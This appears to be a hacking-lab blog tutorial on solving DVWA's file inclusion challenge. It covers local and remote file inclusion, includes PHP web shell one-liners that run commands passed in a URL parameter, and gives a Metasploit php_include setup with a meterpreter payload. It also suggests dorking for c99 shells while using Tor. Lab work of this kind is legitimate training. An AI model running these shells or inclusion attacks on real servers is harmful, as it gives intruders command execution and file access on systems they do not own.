Damn Vulnerable Web Application (DVWA) - File Inclusion and WebShells

today we are going to have some fun understanding the full potential of File Inclusion attacks.

my goals for today

1. a few words, Disclaimer, Lab, and links.
2. Web Shells intro with DVWA
3. How to complete the File Inclusion challenge in the new DVWA
4. Metasploit

1. a few words, Disclaimer, Lab, and links.

DISCLAIMER - if you do what i teach you today you WILL go to jail. so dont do this outside of your lab.

Setting up the lab -
For a hacking lab download either VirtualBox or VMWare, or, if you own win10pro, you have Hyper-V. With those you can create virtual machines, and you will need 2 today, one with DVWA, and another as the attacker, which for ease better be kali, download machines from osboxes.

For DVWA you can either download Metasploitable 2 or set up dvwa in some machine.
In my case i just turned them both on an internal network, so they can see each other but no internet (might need to set up DHCP if you dont have any ip).

For basic help about solving dvwa's file inclusion challenge see raoufz1 page. we will try to implements his suggestion for hard and for completing the new challenge version.

I strongly recommend acunetix web-shell tutorial, and will follow it a bit, and try to implement in a more idiot-proof hacksys.vfreaks.com tutorial.

And lastly, metasploit's php-meterpreter

2. Web Shells intro with DVWA

so again, at this point you should have already set your dvwa and partially finish the challenge with  raoufz1 page.

but you should stump into 2 problems, 1st, the help page mentioned 5 books, while you found only 4. (i hope you tried View Page Source, and also did you test for a 4th file? and View Page Source there?)

2nd problems is the hard tier.

so lets start with the last, which is just shorter, his suggestion:

"using file wrapper which accepts both absolute and relative paths and meet bypass our filter: file:///"

let me just show you what he means if we would just take one of the "legal" pages

i trust you to get now how to get the movies file.

now the other way is also the only way to get the 4th movie, and is also our opening point to RFI web shells...

LFI - Local File Inclusion, that's what we did, we included a local file to the page.
RFI - Remote File Inclusion, that's what we are going to do, we will included a file from the attacker to the page. the file can be any script, including a web shell.

so turn back to low difficulty, and open your machine and type (sudo if not kali):

cd /var/www/html
mkdir pwn-dvwa
cd pwn-dvwa
echo -e "<?php \n system(\"dir\"); \n?>" > dir.txt
system apache2 start

what we did here is created a little malicious php and started a web server, now lets go there with our browser in the attacking machine

remember, is my Parrot Linux, running the DVWA, while is the kali.

and there we can now see the content of our folder. i trust you can just learn how to read a file in linux and read the textual content of the requested file and get the 3rd book.

and since the 4th is encoded to solve the challenge we had to use both LFI and RFI.

notice that for the hard tier you would have actually have to use file-upload challenge since the RFI is blocked.


so, a shell is your terminal, or command line (cmd). there you can write any command you can thing (and have permissions) to the computer. therefor, if you would write this code in the kali, at the same folder of  pwn-dvwa:

echo -e "<?php \n system($_GET[ 'cmd' ]); \n?>" > mini.shell

and now browse to /etc/passwd

at this point you can give any command.

want to make it a permanent page? "<?php \n system(\$_GET[ 'cmd' ]); \n?>" > mini.shell


at this this point we already finished part 3
"3. How to complete the File Inclusion challenge in the new DVWA "

and  please stop and go finish

you can also learn so extra here hacksys.vfreaks.com.


there are many prepared and very advanced webshells in the wild (we could get ourselves one like this with wget if we would use NAT), just google that.

lets take 1 example, a more famous one is the c99 shell.

here is how to google dork for that and others.

p.s. better do that while you're in vpn and/or tor.

4. Metasploit

usually if we target a website we would use some tools and the most famous one is Metasploit.

following their tutorial here (make sure ports are free with netstat -ant)

use exploit/unix/webapp/php_include
//this is just the page name, index.php, which can be discluded
set PHPURI /?page=XXpathXX
//path in a url is everything between the domain (bla.com) and the page
set PATH /dvwa/vulnerabilities/fi/
//my parrot linux
//my kali linux
set PAYLOAD php/meterpreter/bind_tcp
//my cookies.....
set HEADERS "Cookie:security=low; PHPSESSID=vncatgk5e9u4h5u02i73ccdss1"

now to know the cookies you must open with F12 your browser, go to NETWORK tab and click on cookies there and build them, that can be a very long thing in the real world, with dvwa you just need the PHPSESSID value changed here

ls to see that you're in

sessions 1 if he jumps out of meterpreter

from here, its about getting root privileges, or other way for of escalation.
you only need versions of everything and try find something with exploit-db ;P


Popular posts from this blog

OverTheWire[.com] Natas Walkthrough - JUST HINT, NO SPOILERS

SOLVED The item could not be indexed successfully because the item failed in the indexing subsystem

Asp.Net Ending Response options, Response.End() vs CompleteRequest()